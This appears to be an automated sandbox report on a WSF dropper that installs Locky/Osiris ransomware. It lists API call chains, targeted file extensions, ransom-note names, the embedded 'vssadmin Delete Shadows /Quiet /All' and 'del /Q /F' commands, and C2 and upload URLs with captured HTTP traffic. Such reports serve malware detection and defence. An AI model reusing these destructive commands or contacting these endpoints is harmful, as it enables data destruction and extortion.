Analysis Report

Overview

General Information

Joe Sandbox Version:	19.0.0
Analysis ID:	230953
Start time:	17:11:31
Joe Sandbox Product:	Cloud
Start date:	06.03.2017
Overall analysis duration:	0h 17m 13s
Report type:	full
Sample file name:	Ground-Label-004117618.doc-2161f8cf7b6c1a1a3a6fdc41083566a5.wsf
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 (Java 1.8.0_101, Flash 22, Acrobat Reader DC 15, Internet Explorer 11, Chrome 51, Firefox 47)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal100.evad.rans.phis.winWSF@13/12@6/27
HCA Information:	Successful, ratio: 95% Number of executed functions: 206 Number of non-executed functions: 601
EGA Information:	Successful, ratio: 83.3%
Cookbook Comments:	Found application associated with file extension: .wsf
Warnings:	Show All Exclude process from analysis (whitelisted): rundll32.exe, MpCmdRun.exe, svchost.exe, WmiApSrv.exe, conhost.exe, WMIADAP.exe Execution Graph export aborted for target wscript.exe, PID 3044 because there are no executed function Report size getting too big, too many NtDeviceIoControlFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--"

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02589370 __EH_prolog,CryptGenRandom,CryptCreateHash,GetLastError,CryptSetHashParam,GetLastError,	3_2_02589370
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_0258864E __EH_prolog,CryptGenRandom,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,CryptEncrypt,GetLastError,EnterCriticalSection,LeaveCriticalSection,Sleep,EnterCriticalSection,LeaveCriticalSection,EnterCriticalSection,LeaveCriticalSection,CryptDestroyHash,CryptDestroyKey,CryptDestroyHash,CryptDestroyKey,	3_2_0258864E
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02581980 CryptDestroyKey,CryptImportKey,GetLastError,	3_2_02581980
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_0258755C __EH_prolog,CryptAcquireContextA,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDestroyHash,CryptReleaseContext,	3_2_0258755C
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025830AC CryptDestroyKey,	3_2_025830AC
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025826F3 CloseHandle,CreateFileW,CloseHandle,CryptGenRandom,GetLastError,	3_2_025826F3
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025816BA CryptDestroyKey,	3_2_025816BA
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02581A70 CryptDestroyKey,	3_2_02581A70
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025817ED CryptEncrypt,GetLastError,	3_2_025817ED
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02596BA6 CryptDestroyKey,	3_2_02596BA6
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02588C0C CryptDestroyHash,CryptDestroyKey,	3_2_02588C0C
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025836F3 __EH_prolog,CryptAcquireContextA,CryptReleaseContext,	3_2_025836F3
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025816F5 CryptSetKeyParam,GetLastError,	3_2_025816F5
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02582E25 CryptGenRandom,GetLastError,	3_2_02582E25
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02583DA7 CryptDestroyKey,CryptReleaseContext,	3_2_02583DA7
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02589298 CryptGetKeyParam,GetLastError,	3_2_02589298
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025837FF __EH_prolog,CryptDestroyKey,CryptReleaseContext,	3_2_025837FF
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02582273 __EH_prolog,GetFileAttributesExW,GetLastError,SetFileAttributesW,CloseHandle,MoveFileExW,GetLastError,CloseHandle,CreateFileW,CloseHandle,CryptGenRandom,GetLastError,CryptEncrypt,GetLastError,GetSystemTimeAsFileTime,CloseHandle,SetFileAttributesW,CloseHandle,GetLastError,	3_2_02582273
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02587B8A __EH_prolog,CryptGetHashParam,GetLastError,	3_2_02587B8A
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02596B93 CryptReleaseContext,	3_2_02596B93
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02588C2C __EH_prolog,EnterCriticalSection,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,CryptImportKey,GetLastError,CryptDestroyKey,LeaveCriticalSection,	3_2_02588C2C
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02587B7C CryptDestroyHash,	3_2_02587B7C
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025892E4 CryptHashData,GetLastError,	3_2_025892E4
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025836C6 CryptReleaseContext,	3_2_025836C6
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025836E3 CryptReleaseContext,	3_2_025836E3
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_0258932B CryptGetHashParam,GetLastError,	3_2_0258932B
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025890B5 CryptGenRandom,GetLastError,	3_2_025890B5
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_0040200D CryptMsgCountersignEncoded,LoadMenuA,CreateMenu,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,CryptMsgDuplicate,GetStockObject,GetStockObject,SelectObject,GetStockObject,GetObjectA,SendMessageA,OffsetRect,GetPixel,BeginPaint,DrawTextA,DefWindowProcA,BeginPaint,GetClientRect,DrawTextA,EndPaint,PostQuitMessage,DefWindowProcA,GetDlgItem,CreateWindowExA,BeginPaint,SetWindowPos,SetWindowLongA,BeginPaint,MultiByteToWideChar,BeginPaint,MultiByteToWideChar,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowRect,GetCursorPos,PtInRect,SendMessageA,GetScrollPos,SetScrollPos,InvalidateRect,BeginPaint,LockResource,GetClientRect,DrawTextA,EndPaint,MoveWindow,SetFocus,FreeResource,PostQuitMessage,GetDC,GetTextMetricsA,ReleaseDC,GetSystemMetrics,CreateWindowExA,LoadStringA,FindResourceA,LoadResource,LockResource,CharNextA,SetScrollRange,SetScrollPos,SendMessageA,GetLastError,CreateWindowExA,ImageList_Create,SendMessageA,SendMessageA,ICLocate,ICOpen,ICSendMessage,ICClose,ICInfo,ICGetInfo,SendM	3_1_0040200D

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02581980 CryptDestroyKey,CryptImportKey,GetLastError,	3_2_02581980
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02588C2C __EH_prolog,EnterCriticalSection,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,CryptImportKey,GetLastError,CryptDestroyKey,LeaveCriticalSection,	3_2_02588C2C
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_0040200D CryptMsgCountersignEncoded,LoadMenuA,CreateMenu,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,CryptMsgDuplicate,GetStockObject,GetStockObject,SelectObject,GetStockObject,GetObjectA,SendMessageA,OffsetRect,GetPixel,BeginPaint,DrawTextA,DefWindowProcA,BeginPaint,GetClientRect,DrawTextA,EndPaint,PostQuitMessage,DefWindowProcA,GetDlgItem,CreateWindowExA,BeginPaint,SetWindowPos,SetWindowLongA,BeginPaint,MultiByteToWideChar,BeginPaint,MultiByteToWideChar,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowRect,GetCursorPos,PtInRect,SendMessageA,GetScrollPos,SetScrollPos,InvalidateRect,BeginPaint,LockResource,GetClientRect,DrawTextA,EndPaint,MoveWindow,SetFocus,FreeResource,PostQuitMessage,GetDC,GetTextMetricsA,ReleaseDC,GetSystemMetrics,CreateWindowExA,LoadStringA,FindResourceA,LoadResource,LockResource,CharNextA,SetScrollRange,SetScrollPos,SendMessageA,GetLastError,CreateWindowExA,ImageList_Create,SendMessageA,SendMessageA,ICLocate,ICOpen,ICSendMessage,ICClose,ICInfo,ICGetInfo,SendM	3_1_0040200D

Contains functionalty to encrypt and move a file in one function

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02582273 __EH_prolog,GetFileAttributesExW,GetLastError,SetFileAttributesW,CloseHandle,MoveFileExW,GetLastError,CloseHandle,CreateFileW,CloseHandle,CryptGenRandom,GetLastError,CryptEncrypt,GetLastError,GetSystemTimeAsFileTime,CloseHandle,SetFileAttributesW,CloseHandle,GetLastError,

3_2_02582273

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: a1.exe	Binary or memory string: _HELP_instructions.html_HELP_instructions.bmp_HELP_instructions.txt_Locky_recover_instructions.bmp_Locky_recover_instructions.txttmpwinntApplication DataAppDataProgram Files (x86)Program Filestempthumbs.db$Recycle.BinSystem Volume InformationBootWindows.yuv.ycbcra.xis.x3f.x11.wpd.tex.sxg.stx.st8.st5.srw.srf.sr2.sqlitedb.sqlite3.sqlite.sdf.sda.sd0.s3db.rwz.rwl.rdb.rat.raf.qby.qbx.qbw.qbr.qba.py.psafe3.plc.plus_muhd.pdd.p7c.p7b.oth.orf.odm.odf.nyf.nxl.nx2.nwb.ns4.ns3.ns2.nrw.nop.nk2.nef.ndd.myd.mrw.moneywell.mny.mmw.mfw.mef.mdc.lua.kpdx.kdc.kdbx.kc2.jpe.incpas.iiq.ibz.ibank.hbk.gry.grey.gray.fhd.fh.ffd.exf.erf.erbsql.eml.dxg.drf.dng.dgc.des.der.ddrw.ddoc.dcs.dc2.db_journal.csl.csh.crw.craw.cib.ce2.ce1.cdrw.cdr6.cdr5.cdr4.cdr3.bpw.bgt.bdb.bay.bank.backupdb.backup.back.awg.apj.ait.agdl.ads.adb.acr.ach.accdt.accdr.accde.ab4.3pr.3fr.vmxf.vmsd.vhdx.vhd.vbox.stm.st7.rvt.qcow.qed.pif.pdb.pab.ost.ogg.nvram.ndf.m4p.m2ts.log.hpp.hdd.groups.flvv.edb.dit.dat.cmt.bin.aiff.xlk.wad.tlg.st6.st4.say.sas7bdat.qbm.qbb.ptx.pfx.pef.
Source: a1.exe	Binary or memory string: @_HELP_instructions.html_HELP_instructions.bmp_HELP_instructions.txt_Locky_recover_instructions.bmp_Locky_recover_instructions.txttmpwinntApplication DataAppDataProgram Files (x86)Program Filestempthumbs.db$Recycle.BinSystem Volume InformationBootWindows.yuv.ycbcra.xis.x3f.x11.wpd.tex.sxg.stx.st8.st5.srw.srf.sr2.sqlitedb.sqlite3.sqlite.sdf.sda.sd0.s3db.rwz.rwl.rdb.rat.raf.qby.qbx.qbw.qbr.qba.py.psafe3.plc.plus_muhd.pdd.p7c.p7b.oth.orf.odm.odf.nyf.nxl.nx2.nwb.ns4.ns3.ns2.nrw.nop.nk2.nef.ndd.myd.mrw.moneywell.mny.mmw.mfw.mef.mdc.lua.kpdx.kdc.kdbx.kc2.jpe.incpas.iiq.ibz.ibank.hbk.gry.grey.gray.fhd.fh.ffd.exf.erf.erbsql.eml.dxg.drf.dng.dgc.des.der.ddrw.ddoc.dcs.dc2.db_journal.csl.csh.crw.craw.cib.ce2.ce1.cdrw.cdr6.cdr5.cdr4.cdr3.bpw.bgt.bdb.bay.bank.backupdb.backup.back.awg.apj.ait.agdl.ads.adb.acr.ach.accdt.accdr.accde.ab4.3pr.3fr.vmxf.vmsd.vhdx.vhd.vbox.stm.st7.rvt.qcow.qed.pif.pdb.pab.ost.ogg.nvram.ndf.m4p.m2ts.log.hpp.hdd.groups.flvv.edb.dit.dat.cmt.bin.aiff.xlk.wad.tlg.st6.st4.say.sas7bdat.qbm.qbb.ptx.pfx.pef
Source: a1.exe	Binary or memory string: .txt.CSV.uot.RTF.pdf.XLS.PPT.stw.sxw.ott.odt.DOC.pem.p12.csr.crt.keywallet.dat\*\SYSTEMvssapi.dllCreateVssBackupComponentsInternal?CreateVssBackupComponents@@YGJPAPAVIVssBackupComponents@@@ZVssFreeSnapshotPropertiesInternalVssFreeSnapshotPropertiesDelete Shadows /Quiet /All\vssadmin.exe

Found string related to ransomware

Show sources

Source: a1.exe	Binary or memory string: &encrypted=
Source: a1.exe	Binary or memory string: &act=gettext&lang=
Source: a1.exe	Binary or memory string: bad allocationAllocConsolekernel32.dll.tmp0123456789ABCDEF.osiris--vector<T> too longstring too longinvalid string position.htm0123456789abcdef\OSIRIS-&length=&failed=&encrypted=&act=stats&path=id=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&v=2&x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=YBNDRFG8EJKMCPQX0T1UWISZA345H769TahomaOSIRIS.htmOSIRIS.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenGlobal\Local\svchost.exe:Zone.IdentifierDELETE&act=gettext&lang=&act=gethtml&lang=FF000000000000FFSoftware\Microsoft\Windows\CurrentVersion\Runopt321opt321map/set<T> too longNtQueryVirtualMemoryntdll.dll/\.IsWow64Processsyscmd.exe /C del /Q /F "0123456789ABCDEFMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)HTTP/1.1/
Source: a1.exe	Binary or memory string: bad allocationAllocConsolekernel32.dll.tmp0123456789ABCDEF.osiris--vector<T> too longstring too longinvalid string position.htm0123456789abcdef\OSIRIS-&length=&failed=&encrypted=&act=stats&path=id=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&v=2&x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=YBNDRFG8EJKMCPQX0T1UWISZA345H769TahomaOSIRIS.htmOSIRIS.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenGlobal\Local\svchost.exe:Zone.IdentifierDELETE&act=gettext&lang=&act=gethtml&lang=FF000000000000FFSoftware\Microsoft\Windows\CurrentVersion\Runopt321opt321map/set<T> too longNtQueryVirtualMemoryntdll.dll/\.IsWow64Processsyscmd.exe /C del /Q /F "0123456789ABCDEFMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)HTTP/1.1/
Source: a1.exe	Binary or memory string: @bad allocationAllocConsolekernel32.dll.tmp0123456789ABCDEF.osiris--vector<T> too longstring too longinvalid string position.htm0123456789abcdef\OSIRIS-&length=&failed=&encrypted=&act=stats&path=id=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&v=2&x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=YBNDRFG8EJKMCPQX0T1UWISZA345H769TahomaOSIRIS.htmOSIRIS.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenGlobal\Local\svchost.exe:Zone.IdentifierDELETE&act=gettext&lang=&act=gethtml&lang=FF000000000000FFSoftware\Microsoft\Windows\CurrentVersion\Runopt321opt321map/set<T> too longNtQueryVirtualMemoryntdll.dll/\.IsWow64Processsyscmd.exe /C del /Q /F "0123456789ABCDEFMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)HTTP/1.1/
Source: a1.exe	Binary or memory string: @bad allocationAllocConsolekernel32.dll.tmp0123456789ABCDEF.osiris--vector<T> too longstring too longinvalid string position.htm0123456789abcdef\OSIRIS-&length=&failed=&encrypted=&act=stats&path=id=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&v=2&x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=YBNDRFG8EJKMCPQX0T1UWISZA345H769TahomaOSIRIS.htmOSIRIS.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenGlobal\Local\svchost.exe:Zone.IdentifierDELETE&act=gettext&lang=&act=gethtml&lang=FF000000000000FFSoftware\Microsoft\Windows\CurrentVersion\Runopt321opt321map/set<T> too longNtQueryVirtualMemoryntdll.dll/\.IsWow64Processsyscmd.exe /C del /Q /F "0123456789ABCDEFMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)HTTP/1.1/
Source: a1.exe	Binary or memory string: @bad allocationAllocConsolekernel32.dll.tmp0123456789ABCDEF.osiris--vector<T> too longstring too longinvalid string position.htm0123456789abcdef\OSIRIS-&length=&failed=&encrypted=&act=stats&path=id=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&v=2
Source: a1.exe	Binary or memory string: &x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=YBNDRFG8EJKMCPQX0T1UWISZA345H769TahomaOSIRIS.htmOSIRIS.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenGlobal\Local\svchost.exe:Zone.IdentifierDELETE&act=gettext&lang=&act=gethtml&lang=FF000000000000FFSoftware\Microsoft\Windows\CurrentVersion\Runopt321opt321map/set<T> too longNtQueryVirtualMemoryntdll.dll/\.IsWow64Processsyscmd.exe /C del /Q /

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: a1.exe	Binary or memory string: HELP_instructions.txt
Source: a1.exe	Binary or memory string: HELP_instructions.html
Source: a1.exe	Binary or memory string: HELP_instructions.html
Source: a1.exe	Binary or memory string: HELP_instructions.html
Source: a1.exe	Binary or memory string: HELP_instructions.html

Detected Locky Ransomware

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

3_2_02582273

Protection of GUI:

Contains functionality to create a new desktop

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00B35E5C OpenWindowStationA,SetProcessWindowStation,CreateDesktopA,CreateDesktopA,OpenWindowStationA,SetProcessWindowStation,ConvertStringSecurityDescriptorToSecurityDescriptorA,CreateDesktopA,

5_2_00B35E5C

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_1_004011F3 CoInitialize,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,CreateCompatibleDC,CreateCompatibleDC,SelectObject,BitBlt,DeleteDC,CreateCompatibleDC,SelectObject,SetStretchBltMode,GlobalLock,GlobalUnlock,ReleaseStgMedium,OleInitialize,OleSetClipboard,OleFlushClipboard,CoInitialize,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,CreateEnhMetaFileA,Rectangle,MoveToEx,LineTo,GetDlgItem,SendMessageA,ImageList_DragShowNolock,GetDC,CoInitialize,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GetDlgItem,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,GetClientRect,GlobalLock,GlobalUnlock,ReleaseStgMedium,CreateEnhMetaFileA,Rectangle,MoveToEx,LineTo,OpenClipboard,EmptyClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,OpenClipboard,EmptyClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,__ftol2,CoInitialize,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,LoadIconA,LoadCursorA,GetStockObject,OleInitialize,Ol

3_1_004011F3

Creates a DirectInput object (often for capturing keystrokes)

Show sources

Source: a1.exe

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Window created: window name: CLIPBRDWNDCLASS

Networking:

Contains functionality to download additional files from the internet

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02587E2D InternetSetOptionA,ObtainUserAgentString,InternetOpenA,GetLastError,InternetCloseHandle,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,HttpOpenRequestA,GetLastError,InternetQueryOptionA,InternetSetOptionA,InternetSetOptionA,HttpAddRequestHeadersA,GetLastError,InternetWriteFile,HttpEndRequestA,GetLastError,GetLastError,HttpSendRequestA,GetLastError,HttpQueryInfoA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_02587E2D

Downloads compressed data via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OK Set-Cookie: mediaplanBAK=R129296274; path=/; expires=Mon, 06-Mar-2017 17:12:04 GMT Date: Mon, 06 Mar 2017 16:12:44 GMT Content-Type: text/javascript Content-Length: 935 Set-Cookie: mediaplan=R3757231269; path=/; expires=Mon, 06-Mar-2017 17:13:15 GMT Server: Apache X-Powered-By: PHP/5.3.29 Cache-Control: max-age=900 Expires: Mon, 06 Mar 2017 16:27:44 GMT Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 1f 8b 08 00 00 00 00 00 00 03 7d 56 0d 6f da 3a 14 fd 2b 79 96 b6 26 0a 4b 81 75 52 37 96 4d 94 d1 0f 95 7e ac a0 f5 ad d3 54 89 c4 29 5e 1d 3b 4d 0c 84 21 fe fb 73 ba 98 c7 8e a1 12 12 ce bd ce f1 bd Data Ascii: }Vo:+y&KuR7M~T)^;M!s

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /counter/?a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&m=binging&i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: med-lex.com Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=01 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kidsgalaxy.fr Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=11 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: baltasmenulis.lt Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=12 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: baltasmenulis.lt Connection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: powershell.exe

String found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: med-lex.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /checkupdate HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://109.234.36.12/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 109.234.36.12 Content-Length: 753 Connection: Keep-Alive

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: powershell.exe	String found in binary or memory: file:///
Source: wscript.exe	String found in binary or memory: file:///c:/ground-label-004117618.doc-2161f8cf7b6c1a1a3a6fdc41083566a5.wsf
Source: wscript.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/a1.exe
Source: wscript.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/a2.exe
Source: wscript.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/a2.exe9
Source: powershell.exe	String found in binary or memory: file:///c:/windows/syswow64/windowspowershell/v1.0/a
Source: mshta.exe	String found in binary or memory: file:///c:/windows/syswow64/windowspowershell/v1.0/powershell.exe
Source: wscript.exe, a1.exe, powershell.exe	String found in binary or memory: http://
Source: a1.exe	String found in binary or memory: http://109.234.36.12
Source: a1.exe	String found in binary or memory: http://109.234.36.12/
Source: a1.exe	String found in binary or memory: http://109.234.36.12/checkupdate
Source: a1.exe	String found in binary or memory: http://109.234.36.12/checkupdateel
Source: a1.exe	String found in binary or memory: http://109.234.36.12/checkupdatenet
Source: a1.exe	String found in binary or memory: http://109.234.36.12/checkupdates
Source: a1.exe	String found in binary or memory: http://109.234.36.12/checkupdatetemp
Source: a1.exe	String found in binary or memory: http://109.234.36.12b8%d1s%27kf%1
Source: regsvr32.exe	String found in binary or memory: http://15.241.211.182
Source: regsvr32.exe	String found in binary or memory: http://15.241.211.182/
Source: regsvr32.exe	String found in binary or memory: http://15.241.211.182/n
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php
Source: a2.exe, powershell.exe, regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php2
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:al
Source: a2.exe	String found in binary or memory: http://185.117.72.90/upload.php:al$m
Source: a2.exe	String found in binary or memory: http://185.117.72.90/upload.php:al%
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:al2
Source: powershell.exe, regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:al940196953103877199811371834197299886690010229547993815721647414299
Source: a2.exe, powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:al:mainanti
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:al:mainantih
Source: a2.exe	String found in binary or memory: http://185.117.72.90/upload.php:al;
Source: a2.exe, powershell.exe, regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:ald10d:1:dd10ddd11d:0:dd11ddd12d:1:dd12ddd13d:1:dd13ddd14d:1:dd14ddd
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:ali
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:alj
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:alk
Source: a2.exe, powershell.exe, regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:alload.php:aload.php:aload.php:aload.php:aload.php:aload.php:aload.p
